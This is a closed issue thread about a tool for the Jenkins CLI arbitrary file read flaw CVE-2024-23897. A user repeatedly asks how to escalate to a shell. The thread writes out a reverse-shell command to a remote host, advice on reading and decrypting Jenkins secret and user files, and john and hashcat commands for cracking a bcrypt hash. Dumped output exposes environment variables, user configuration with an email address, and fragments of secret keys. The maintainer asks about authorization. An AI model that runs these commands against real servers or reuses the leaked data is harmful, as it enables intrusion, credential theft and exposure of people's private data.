Closed sec13b closed 1 hour ago
You can read this article to understand https://www.leavesongs.com/PENETRATION/jenkins-cve-2024-23897.html
But This is difficult to achieve. The old version of Jenkins user password is encrypted rather than hash. Tools such as jenkins-decrypt can be used to decrypt passwords, and some plug-ins can also be used for further attacks.
My tool can only help verify whether the vulnerability exists.
i read the article . can you indicate who are "the some plug-ins can also be used for further attacks"
if it used : /bin/bash
with : -a /bin/bash -c /dev/tcp/vps/11011
the command "/bin/bash -c 'bash -i >& /dev/tcp/vps/11011 0>&1'" cant be used
I haven't looked too closely at how this vulnerability can be rced, but you can try to read the file /var/jenkins_home/users/users.xml. If you can decrypt the administrator's password, you can log in to the background to use it. The essence of this vulnerability is to read the file caused by parsing errors, so you can try to start from the file.
i am not the magician hudini :D
The command in the tool and the command of shell are two different things. The command in the tool refers to the command of jenkins-cli, so the rebound shell you understand is two different things.
D
这句话是啥意思
i think missing or is moved ERROR: No such file: /var/jenkins_home/users/users.xml
jenkins:x:111:117:Jenkins,,,:/var/lib/jenkins:/bin/bash
It is possible that your goal is not deployed by default. Try other files that you can read, such as /erc/paaswd. As I said at the beginning, this vulnerability can only read files. rce can only be used in a specific environment. It is very difficult.
from environ :
Command: connect-node Filename: /proc/self/environ XDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkinsXDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkins
i just want to know where i can find users.xml
Filename: /proc/self/cmdline /usr/bin/java-Djava.awt.headless=true-Djava.net.preferIPv4Stack=true-Dhudson.DNSMultiCast.disabled=true-jar/usr/share/jenkins/jenkins.war--webroot=/var/cache/jenkins/war--httpPort=8080--httpListenAddress=0.0.0.0
from environ :
Command: connect-node
Filename: /proc/self/environ
XDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkinsXDG_SESSION_ID=c1SHELL=/bin/bashUSER=jenkinsMAIL=/var/mail/jenkinsPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/binPWD=/var/lib/jenkinsLANG=en_US.UTF-8SHLVL=1HOME=/var/lib/jenkinsLOGNAME=jenkinsXDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktopXDG_RUNTIMEDIR=/run/user/111=/usr/bin/daemonJENKINS_HOME=/var/lib/jenkins
i just want to know where i can find users.xml
read this /var/lib/jenkins/ users/user.xml
/var/lib/jenkins/secret.key
/var/lib/jenkins/secrets/master.key
for /var/lib/jenkins/secret.key ERROR: No such agent "13ff71cb60d11dc4e198bad1f28e4dd6968b95bd04aca543bd41e517c6ba866b" exists.
for /var/lib/jenkins/secrets/master.key ERROR: No such agent "cd4b3f7c97f5dd167f360ef444e0f4c2d5509ac18fc7269fd1662657fe9cc07f002a3a5aed1608e984ddfa7efdfcbcf33a652cb175c5b2b3d37005865a6f11205b87c59c5cc944d5657e4c857aaad269b839affdf4686b73810efba3308c1ceb406233efe5a1d1f9f61af496b834293c859a983be6751b9610e9bf28de7bdc66" exists.
for "@/var/lib/jenkins/users/users.xml"
<string>mft</string>: No such agent " <string>mft</string>" exists.
<string>54345792Malecl_5882327822420028333</string>: No such agent " <string>54345792Malecl_5882327822420028333</string>" exists.
<string>34802073Ordast_4358670235219068815</string>: No such agent " <string>34802073Ordast_4358670235219068815</string>" exists.
<string>jomatgithub_5935750980920288132</string>: No such agent "
<string>jomatgithub_5935750980920288132</string>" exists.
for "@/var/lib/jenkins/users/jomatgithub_5935750980920288132/config.xml"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
<tokenList/>: No such agent " <tokenList/>" exists.
</hudson.model.AllView>: No such agent " </hudson.model.AllView>" exists.
<fullName>jomat+github</fullName>: No such agent " <fullName>jomat+github</fullName>" exists.
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>: No such agent " </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>" exists.
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>: No such agent " <owner class="hudson.model.MyViewsProperty" reference="../../.."/>" exists.
<hudson.search.UserSearchProperty>: No such agent " <hudson.search.UserSearchProperty>" exists.
</properties>: No such agent " </properties>" exists.
</tokenStore>: No such agent " </tokenStore>" exists.
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">: No such agent " <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">" exists.
</hudson.search.UserSearchProperty>: No such agent " </hudson.search.UserSearchProperty>" exists.
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: No such agent " </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>" exists.
</hudson.plugins.favorite.user.FavoriteUserProperty>: No such agent " </hudson.plugins.favorite.user.FavoriteUserProperty>" exists.
<insensitiveSearch>true</insensitiveSearch>: No such agent " <insensitiveSearch>true</insensitiveSearch>" exists.
<properties class="hudson.model.View$PropertyList"/>: No such agent " <properties class="hudson.model.View$PropertyList"/>" exists.
<properties>: No such agent " <properties>" exists.
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">: No such agent " <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">" exists.
<hudson.model.MyViewsProperty>: No such agent " <hudson.model.MyViewsProperty>" exists.
<hudson.model.AllView>: No such agent " <hudson.model.AllView>" exists.
</user>: No such agent "</user>" exists.
<autofavoriteEnabled>true</autofavoriteEnabled>: No such agent " <autofavoriteEnabled>true</autofavoriteEnabled>" exists.
</jenkins.security.ApiTokenProperty>: No such agent " </jenkins.security.ApiTokenProperty>" exists.
<hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>: No such agent " <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>" exists.
<providerId>default</providerId>: No such agent " <providerId>default</providerId>" exists.
<views>: No such agent " <views>" exists.
<user>: No such agent "<user>" exists.
<hudson.model.PaneStatusProperties>: No such agent " <hudson.model.PaneStatusProperties>" exists.
<name>all</name>: No such agent " <name>all</name>" exists.
<?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists.
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">: No such agent " <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">" exists.
<collapsed/>: No such agent " <collapsed/>" exists.
</io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>: No such agent " </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>" exists.
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: No such agent " </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>" exists.
<data class="concurrent-hash-map"/>: No such agent " <data class="concurrent-hash-map"/>" exists.
</hudson.model.MyViewsProperty>: No such agent " </hudson.model.MyViewsProperty>" exists.
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: No such agent " <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>" exists.
<tokenStore>: No such agent " <tokenStore>" exists.
<filterExecutors>false</filterExecutors>: No such agent " <filterExecutors>false</filterExecutors>" exists.
<hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">: No such agent " <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">" exists.
<io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">: No such agent " <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">" exists.
<triggers/>: No such agent " <triggers/>" exists.
<filterQueue>false</filterQueue>: No such agent " <filterQueue>false</filterQueue>" exists.
<jenkins.security.ApiTokenProperty>: No such agent " <jenkins.security.ApiTokenProperty>" exists.
</views>: No such agent " </views>" exists.
</hudson.model.PaneStatusProperties>: No such agent " </hudson.model.PaneStatusProperties>" exists.
<emailAddress>jomat+github@jmt.gr</emailAddress>: No such agent " <emailAddress>jomat+github@jmt.gr</emailAddress>" exists.
</hudson.tasks.Mailer_-UserProperty>: No such agent " </hudson.tasks.Mailer_-UserProperty>" exists.
<hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">: No such agent " <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">" exists.
ERROR: Error occurred while performing this command, see previous stderr output.
for /var/lib/jenkins/secret.key
ERROR: No such agent "13ff71cb60d11dc4e198bad1f28e4dd6968b95bd04aca543bd41e517c6ba866b" exists.
for /var/lib/jenkins/secrets/master.key
ERROR: No such agent "cd4b3f7c97f5dd167f360ef444e0f4c2d5509ac18fc7269fd1662657fe9cc07f002a3a5aed1608e984ddfa7efdfcbcf33a652cb175c5b2b3d37005865a6f11205b87c59c5cc944d5657e4c857aaad269b839affdf4686b73810efba3308c1ceb406233efe5a1d1f9f61af496b834293c859a983be6751b9610e9bf28de7bdc66" exists.
for "@/var/lib/jenkins/users/users.xml"
<string>mft</string>: No such agent " <string>mft</string>" exists. <string>54345792Malecl_5882327822420028333</string>: No such agent " <string>54345792Malecl_5882327822420028333</string>" exists. <string>34802073Ordast_4358670235219068815</string>: No such agent " <string>34802073Ordast_4358670235219068815</string>" exists. <string>jomatgithub_5935750980920288132</string>: No such agent " <string>jomatgithub_5935750980920288132</string>" exists.
for "@/var/lib/jenkins/users/jomatgithub_5935750980920288132/config.xml"
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true <tokenList/>: No such agent " <tokenList/>" exists. </hudson.model.AllView>: No such agent " </hudson.model.AllView>" exists. <fullName>jomat+github</fullName>: No such agent " <fullName>jomat+github</fullName>" exists. </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>: No such agent " </hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>" exists. <owner class="hudson.model.MyViewsProperty" reference="../../.."/>: No such agent " <owner class="hudson.model.MyViewsProperty" reference="../../.."/>" exists. <hudson.search.UserSearchProperty>: No such agent " <hudson.search.UserSearchProperty>" exists. </properties>: No such agent " </properties>" exists. </tokenStore>: No such agent " </tokenStore>" exists. <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">: No such agent " <com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.1.18">" exists. </hudson.search.UserSearchProperty>: No such agent " </hudson.search.UserSearchProperty>" exists. </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>: No such agent " </com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>" exists. </hudson.plugins.favorite.user.FavoriteUserProperty>: No such agent " </hudson.plugins.favorite.user.FavoriteUserProperty>" exists. <insensitiveSearch>true</insensitiveSearch>: No such agent " <insensitiveSearch>true</insensitiveSearch>" exists. <properties class="hudson.model.View$PropertyList"/>: No such agent " <properties class="hudson.model.View$PropertyList"/>" exists. <properties>: No such agent " <properties>" exists. <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">: No such agent " <hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.63">" exists. <hudson.model.MyViewsProperty>: No such agent " <hudson.model.MyViewsProperty>" exists. <hudson.model.AllView>: No such agent " <hudson.model.AllView>" exists. </user>: No such agent "</user>" exists. <autofavoriteEnabled>true</autofavoriteEnabled>: No such agent " <autofavoriteEnabled>true</autofavoriteEnabled>" exists. </jenkins.security.ApiTokenProperty>: No such agent " </jenkins.security.ApiTokenProperty>" exists. <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>: No such agent " <hudson.plugins.ircbot.IrcUserProperty plugin="ircbot@2.30"/>" exists. <providerId>default</providerId>: No such agent " <providerId>default</providerId>" exists. <views>: No such agent " <views>" exists. <user>: No such agent "<user>" exists. <hudson.model.PaneStatusProperties>: No such agent " <hudson.model.PaneStatusProperties>" exists. <name>all</name>: No such agent " <name>all</name>" exists. <?xml version='1.1' encoding='UTF-8'?>: No such agent "<?xml version='1.1' encoding='UTF-8'?>" exists. <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">: No such agent " <org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.2.0">" exists. <collapsed/>: No such agent " <collapsed/>" exists. </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>: No such agent " </io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty>" exists. </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>: No such agent " </org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>" exists. <data class="concurrent-hash-map"/>: No such agent " <data class="concurrent-hash-map"/>" exists. </hudson.model.MyViewsProperty>: No such agent " </hudson.model.MyViewsProperty>" exists. <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>: No such agent " <domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash"/>" exists. <tokenStore>: No such agent " <tokenStore>" exists. <filterExecutors>false</filterExecutors>: No such agent " <filterExecutors>false</filterExecutors>" exists. <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">: No such agent " <hudson.tasks.Mailer_-UserProperty plugin="mailer@1.21">" exists. <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">: No such agent " <io.jenkins.blueocean.autofavorite.user.FavoritingUserProperty plugin="blueocean-autofavorite@1.2.2">" exists. <triggers/>: No such agent " <triggers/>" exists. <filterQueue>false</filterQueue>: No such agent " <filterQueue>false</filterQueue>" exists. <jenkins.security.ApiTokenProperty>: No such agent " <jenkins.security.ApiTokenProperty>" exists. </views>: No such agent " </views>" exists. </hudson.model.PaneStatusProperties>: No such agent " </hudson.model.PaneStatusProperties>" exists. <emailAddress>jomat+github@jmt.gr</emailAddress>: No such agent " <emailAddress>jomat+github@jmt.gr</emailAddress>" exists. </hudson.tasks.Mailer_-UserProperty>: No such agent " </hudson.tasks.Mailer_-UserProperty>" exists. <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">: No such agent " <hudson.plugins.favorite.user.FavoriteUserProperty plugin="favorite@2.3.2">" exists. ERROR: Error occurred while performing this command, see previous stderr output.
Is your penetration legal and compliant?
is mine
i have clave av , and this dont see what i run
I mean, are you authorized to act?
Otherwise, I may not be able to answer you.
Our discussion is limited to how to use tools.
is my Jenkins server .
i try : println(hudson.util.Secret.decrypt("{XXX=}"))
and println(hudson.util.Secret.fromString("{XXX=}").getPlainText())
dont show
i try :
println(hudson.util.Secret.decrypt("{XXX=}"))
and
println(hudson.util.Secret.fromString("{XXX=}").getPlainText())
dont show
This vulnerability can't support you to do this. Maybe that's all I can use. From the file you gave me, I can't see anything that can be used in the future.
i make update
i make update
yes
with more Nvidia : John hashfile --wordlist /usr/share/wordlists/rockyou.txt --format=bcrypt
hashcat-m 3200 -O -w 4 $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm .\lists\rockyou.txt
how i can use list commands or more better , how we can get shell ?